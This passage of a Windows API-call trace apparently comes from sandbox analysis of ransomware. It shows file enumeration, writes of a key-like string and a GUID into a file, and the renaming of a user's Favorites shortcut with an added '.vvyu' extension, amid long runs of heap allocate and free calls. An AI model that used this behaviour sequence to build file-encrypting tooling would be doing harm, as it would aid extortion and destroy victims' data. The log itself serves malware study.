(HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.776] WriteFile (in: hFile=0x558, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.777] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.777] WriteFile (in: hFile=0x558, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.777] CloseHandle (hObject=0x558) returned 1 [0198.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0198.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.778] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url.vvyu")) returned 1 [0198.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.780] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.783] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 0 [0198.783] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0198.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0198.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0198.783] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0198.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0198.783] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0198.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0198.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0198.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0198.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0198.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0198.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0198.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0198.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0198.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0198.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0198.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0198.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0198.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0198.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0198.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 